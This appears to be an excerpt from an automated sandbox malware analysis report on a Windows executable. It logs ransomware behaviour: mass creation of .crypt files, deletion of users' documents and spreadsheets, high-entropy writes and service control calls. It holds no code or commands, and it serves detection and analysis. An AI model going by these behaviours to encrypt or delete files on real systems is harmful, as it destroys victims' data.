Source: bkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmpString found in binary or memory: https://www.openssl.org/docs/faq.html....................crypto
Source: bkscEXd86b.exe, 00000000.00000002.495300837.00000000008AA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

barindex
May encrypt documents and pictures (Ransomware)Show sources
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\chrome_shutdown_ms.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\internet explorer\brndlog.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\devicesearchcache\settingscache.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\devicesearchcache\appcache132600094041057726.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\devicesearchcache\appcache132600094049800822.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsglobals.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appssynonyms.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_2[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_3[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_4[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_5[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_6[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_7[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_8[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_9[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{9cfaf1d6-6e29-48d5-bbca-37818f17724f}\0.0.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{9cfaf1d6-6e29-48d5-bbca-37818f17724f}\0.1.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{9cfaf1d6-6e29-48d5-bbca-37818f17724f}\0.2.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\0.0.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\0.1.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\0.2.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{f2b360b1-22a9-410c-8bc0-d5be522c6486}\0.0.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{f2b360b1-22a9-410c-8bc0-d5be522c6486}\0.1.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{f2b360b1-22a9-410c-8bc0-d5be522c6486}\0.2.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsconversions.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsconversions.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsglobals.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingssynonyms.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.0.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.1.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.2.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.0.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.1.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.2.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_10[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_11[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_12[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_13[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_14[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_15[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_16[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_17[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_18[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_19[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_20[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_21[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_22[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_23[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_24[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_25[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_26[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_27[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\desktop\gaobcviqij\gaobcviqij.docx.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\desktop\gaobcviqij.docx.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\desktop\qcfwyskmha\qcfwyskmha.docx.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\desktop\qcfwyskmha.docx.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\desktop\qncycdfijj\qncycdfijj.docx.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\desktop\qncycdfijj.docx.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\documents\gaobcviqij\gaobcviqij.docx.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\documents\gaobcviqij.docx.cryptJump to behavior
Modifies existing user documents (likely ransomware behavior)Show sources
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile deleted: C:\Users\user\Desktop\QNCYCDFIJJ.xlsxJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ.docxJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile deleted: C:\Users\user\Desktop\PIVFAGEAAV.xlsxJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile deleted: C:\Users\user\Desktop\QNCYCDFIJJ.docxJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile deleted: C:\Users\user\Desktop\PWCCAWLGRE.xlsxJump to behavior
Writes many files with high entropyShow sources
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Network\Downloader\edb.log.CRYPT entropy: 7.99998048858Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log.CRYPT entropy: 7.99983368447Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.CRYPT entropy: 7.99996975555Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log.CRYPT entropy: 7.99757113066Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log.CRYPT entropy: 7.99654417421Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log.CRYPT entropy: 7.99690553802Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.CRYPT entropy: 7.99853065622Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat.bak.CRYPT entropy: 7.99974371926Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.CRYPT entropy: 7.99966984696Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.CRYPT entropy: 7.99997950584Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.CRYPT entropy: 7.99985273162Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini.CRYPT entropy: 7.99180074345Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Provisioning\Microsoft-Desktop-Provisioning-Sequence.dat.CRYPT entropy: 7.99992495067Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.CRYPT entropy: 7.99935464182Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000003.db.CRYPT entropy: 7.99983422924Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.CRYPT entropy: 7.99991992498Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CRYPT entropy: 7.99999598784Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CE.CRYPT entropy: 7.99944086327Jump to dropped file
Source: C:\Users\user\Desktop\bkscEXd86b.exeProcess Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B91C80 OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,SetServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00B91C80
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9A8B00_2_00B9A8B0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA40800_2_00BA4080
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9E8F00_2_00B9E8F0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BB40F00_2_00BB40F0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B990300_2_00B99030
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9F8300_2_00B9F830
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BCA8000_2_00BCA800
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BB90700_2_00BB9070
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BB605D0_2_00BB605D
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA28500_2_00BA2850
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9E1E00_2_00B9E1E0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9D1E00_2_00B9D1E0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9D9D90_2_00B9D9D9
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA41C00_2_00BA41C0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA21000_2_00BA2100
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BC91000_2_00BC9100
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9D9600_2_00B9D960
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B991600_2_00B99160
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9B9400_2_00B9B940
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9B2D70_2_00B9B2D7
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9A2300_2_00B9A230
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C702710_2_00C70271
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9CA700_2_00B9CA70
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9C2400_2_00B9C240
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9DBA00_2_00B9DBA0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9E3800_2_00B9E380
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA6B800_2_00BA6B80
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9CB300_2_00B9CB30
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B993100_2_00B99310
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA83400_2_00BA8340
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9FCB10_2_00B9FCB1
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9FCB00_2_00B9FCB0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA3CD00_2_00BA3CD0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B98CC00_2_00B98CC0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA2C000_2_00BA2C00
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B99C400_2_00B99C40
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9CD900_2_00B9CD90
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9D5F00_2_00B9D5F0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA15290_2_00BA1529
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B996B00_2_00B996B0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BC96900_2_00BC9690
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA0E860_2_00BA0E86
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9E6E10_2_00B9E6E1
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9E6E00_2_00B9E6E0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9DEC00_2_00B9DEC0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BB96500_2_00BB9650
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BB4FA00_2_00BB4FA0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9FF800_2_00B9FF80
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9CFE00_2_00B9CFE0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA17E00_2_00BA17E0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9D7D00_2_00B9D7D0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9BFD00_2_00B9BFD0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B9AF300_2_00B9AF30
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: String function: 00BA3490 appears 95 times
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: String function: 00C6BB10 appears 108 times
Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 3388 -ip 3388
Source: bkscEXd86b.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: classification engineClassification label: mal76.rans.spyw.evad.winEXE@9/201@0/1
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B92130 StartServiceCtrlDispatcherA,0_2_00B92130
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B92130 StartServiceCtrlDispatcherA,0_2_00B92130
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDeleteJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3388
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log.CRYPTJump to behavior
Source: unknownProcess created: C:\Windows\explorer.exe
Source: bkscEXd86b.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile read: C:\$Recycle.Bin\S-1-5-18\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
